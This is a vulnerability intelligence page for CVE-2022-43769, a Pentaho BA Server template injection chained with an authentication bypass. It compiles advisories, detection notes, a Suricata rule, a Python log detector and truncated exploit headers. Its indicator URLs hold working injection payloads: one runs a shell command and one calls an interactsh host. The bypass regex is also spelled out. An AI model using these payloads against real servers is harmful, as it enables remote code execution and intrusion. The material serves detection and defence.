# CVE-2022-43769
Published: 2023-04-03
Priority: P183 · Severity: high · CVSS 3.1: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability, due 2025-03-24
Exploited in the wild
EPSS: 97.67% (99.9th percentile)
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted downstream.
## Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hitachi | vantara_pentaho_business_analytics_server | — | — |
| hitachi | vantara_pentaho_business_analytics_server | >= 8.3.0.0 < 9.3.0.2 | 9.3.0.2 |
| hitachi_vantara | pentaho_business_analytics_server | >= 1.0 < 9.3.0.2 | 9.3.0.2 |
| hitachi_vantara | pentaho_business_analytics_server | >= 9.4.0.0 < 9.4.0.1 | 9.4.0.1 |
## Detection & IOCs (extracted from sources)
Indicator URLs:
- /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a
- /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{cmd}')}}&mgrDn=a&pwd=a

Detection notes:
- Detect SSTI exploitation attempts by monitoring GET requests to /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js with a 'url' parameter containing Spring/Thymeleaf template expressions (e.g., #{T(java.lang...)}).
- The auth bypass (CVE-2022-43939) is triggered by URLs ending in '/' followed by 'require', optionally '-js' or '-cfg', any character, then 'js'; monitor for non-canonical URL patterns matching this regex against protected Pentaho endpoints.
- In HTTP responses from the vulnerable endpoint, a body of '{}' with a 200 status, an 'application/json' content-type header and a cookie containing 'Path=/pentaho' indicates a successful auth bypass probe.
- For the SSTI RCE probe, a response body of 'false' with an 'application/json' content-type header confirms successful template injection execution.
- Active exploitation observed from 15 malicious IPs between December 6, 2024 and February 28, 2025; top source countries are Singapore, Hong Kong, and United States. Use GreyNoise tags for CVE-2022-43769 to identify and block scanning IPs.
- The exploit (CVE-2022-43769 + CVE-2022-43939 chained) only works on the Enterprise Edition of Pentaho BA Server; community edition behavior is untested.
- Unauthenticated RCE requires chaining both CVE-2022-43939 (auth bypass) and CVE-2022-43769 (SSTI); CVE-2022-43769 alone is rated PR:H (high privilege required) per CVSS.
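The detection notes above describe what to look for but not how to apply it to logs. The Python below is an added example, not code from any of the sources collected on this page: it tags access-log lines that carry the CVE-2022-43939 path shape against protected endpoints and the Spring EL expression in the url parameter of the LDAP config endpoint. The Common Log Format parser, the sample lines and the assumption that everything under /pentaho/api/ is a protected endpoint are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote

# Path shape reconstructed from the CVE-2022-43939 description on this page:
# "/", "require", optionally "-js" or "-cfg", any one character, then "js",
# optionally "?" and anything. Static require*.js files match legitimately,
# so the shape is only suspicious when it targets a protected endpoint.
BYPASS_RE = re.compile(r"/require(?:-js|-cfg)?.js(?:\?.*)?$")
# Spring EL type-reference expression, the SSTI marker from the page's IoCs.
SSTI_RE = re.compile(r"#\{.*T\(", re.DOTALL)
# Assumption: everything under /pentaho/api/ is a protected endpoint.
PROTECTED_PREFIX = "/pentaho/api/"
LDAP_ENDPOINT = "/pentaho/api/ldap/config/ldapTreeNodeChildren/"
# Common Log Format; the request target is the part that gets classified.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify_request(method, target):
    """Return the detection tags that apply to one request target."""
    tags = []
    path, _, query = target.partition("?")
    if path.startswith(PROTECTED_PREFIX) and BYPASS_RE.search(target):
        tags.append("auth-bypass-pattern")
    # parse_qs percent-decodes once; unquote again so "%2523{" is caught too.
    for value in parse_qs(query, keep_blank_values=True).get("url", []):
        if SSTI_RE.search(unquote(value)):
            tags.append("ssti-expression")
            break
    if method == "GET" and path.startswith(LDAP_ENDPOINT) and "ssti-expression" in tags:
        tags.append("cve-2022-43769-probe")
    return tags

def scan_log(lines):
    """Return (client ip, target, tags) for every line that triggers a tag."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        tags = classify_request(m["method"], m["target"])
        if tags:
            hits.append((m["ip"], m["target"], tags))
    return hits

# Constructed sample log: a normal login, a legitimate static require-cfg.js,
# a bypass-shaped path against the API, and an SSTI probe of the LDAP endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Dec/2024:10:00:01 +0000] "GET /pentaho/Login HTTP/1.1" 200 512
203.0.113.5 - - [06/Dec/2024:10:00:02 +0000] "GET /pentaho/content/common-ui/resources/web/require-cfg.js HTTP/1.1" 200 2048
198.51.100.7 - - [06/Dec/2024:10:00:03 +0000] "GET /pentaho/api/system/require.js HTTP/1.1" 200 2
198.51.100.7 - - [06/Dec/2024:10:00:04 +0000] "GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('example.invalid')}&mgrDn=a&pwd=a HTTP/1.1" 200 5
"""
```

Running `scan_log(SAMPLE_LOG.splitlines())` flags only the two 198.51.100.7 lines; the static require-cfg.js request is ignored because it is not under the protected prefix.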
## CVSS provenance
- NVD (v3.1): 7.2 HIGH, CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 8.8 HIGH
- CISA: 7.2 HIGH
## GHSA
GHSA-wc6x-gmp9-8p34: Hitachi Vantara Pentaho Business Analytics Server prior to versions 9
ghsa_unreviewed · 2023-04-03 · CVE-2022-43769 · HIGH · CWE-74
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted downstream.
## VulnCheck
Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
vulncheck · 2022 · CVE-2022-43769 · HIGH · CWE-74 · CVSS 8.8
Hitachi Vantara Pentaho BA Server contains a special element injection vulnerability that allows an attacker to inject Spring templates into properties files, allowing for arbitrary command execution.
Affected: Hitachi Vantara Pentaho Business Analytics (BA) Server
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.greynoise.io/blog/greynoise-observes-exploitation-three-newly-added-kev-vulnerabilities; https://isc.sans.edu/diary/rss/32518; https://www.loginsoft.co
## CISA
Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
cisa · 2025-03-03 · CVE-2022-43769 · HIGH · CWE-74 · CVSS 7.2
Vulnerability: Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
Affected: Hitachi Vantara Pentaho Business Analytics (BA) Server
Hitachi Vantara Pentaho BA Server contains a special element injection vulnerability that allows an attacker to inject Spring templates into properties files, allowing for arbitrary command execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769
## Suricata
ET WEB_SPECIFIC_APPS Hitachi Vantara Pentaho Business Analytics Server Authorization Bypass and Remote Code Execution Attempt (CVE-2022-43769, 2022-43939)
suricata · 2025-03-05 · CVE-2022-43939 · HIGH · CVSS 8.8
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Hitachi Vantara Pentaho Business Analytics Server Authorization Bypass and Remote Code Execution Attempt (CVE-2022-43769, 2022-43939)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/pentaho/api/ldap/config/ldapTreeNodeChildren/"; fast_pattern; startswith; content:"require"; within:50; content:"js|3f|url|3d|"; within:50; content:"|28|java.lang.Runtime|29 2e|getRuntime|28 29 2e|exec|28|"; within:200; reference:cve,2022-43939; reference:cve,2022-437969; reference:url,attackerkb.com/topics/JGGe0nRNNv/cve-2022-43939; reference:url,attackerkb.co
## Exploit-DB
Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb · 2023-04-08 · CVE-2022-43939 · HIGH · CVSS 8.8
---
# Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0w
## Nuclei
Hitachi Pentaho Business Analytics Server - Bypass Authorization
nuclei · CVE-2022-43939 · HIGH · CVSS 7.2
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be circumvented.
Template:
```yaml
id: CVE-2022-43939
info:
  name: Hitachi Pentaho Business Analytics Server - Bypass Authorization
  author: daffainfo
  severity: high
  description: |
    Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be circumvented.
  impact: |
    Unauthenticated attackers can bypass authorization restrictions using non-canonical URL paths to access protected administrative endpoints in Hitachi Pentaho Business Analytics Server, potentially
```
## Nuclei
Hitachi Pentaho Business Analytics Server - Remote Code Execution
nuclei · CVE-2022-43769 · HIGH · CVSS 7.2
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
Template:
```yaml
id: CVE-2022-43769
info:
  name: Hitachi Pentaho Business Analytics Server - Remote Code Execution
  author: dwbzn
  severity: high
  description: |
    Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible
```
## Metasploit
Pentaho Business Server Auth Bypass and Server Side Template Injection RCE
metasploit · CVE-2022-43939 · HIGH · CVSS 7.2
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x is vulnerable to an authentication bypass (CVE-2022-43939) and a Server Side Template Injection (SSTI) vulnerability (CVE-2022-43769) that can be chained together to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server. The first vulnerability (CVE-2022-43939) is an authentication bypass which stems from a regex that allows any URL that ends in "/", followed by "require", optionally "-js" or "-cfg", any character, and then the string "js" followed optionally by "?" and then any characters of the attacker's choice. The second (CVE-2022-43769) is a server side template i
## Checkpoint
10th March – Threat Intelligence Report
blogs_checkpoint · 2025-03-10 · CVE-2025-22224
For the latest discoveries in cyber research for the week of 10th March, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The City of Mission, Texas, has declared a local state of emergency following a severe cybersecurity incident that threatens to expose protected personal information, health records, and other critical data managed by city departments. The emergency declaration was issued by Mayor Norie Gonzalez Garza on March 4, 2025, after
## Greynoiseio
GreyNoise Observes Exploitation of Three Newly Added KEV Vulnerabilities
blogs_greynoiseio · 2025-03-04 · HIGH · CVSS 8.8
## References
- http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html
- https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-43769
## Timeline
- Published: 2023-04-03
- Added to CISA KEV: 2025-03-03
- Exploited in the wild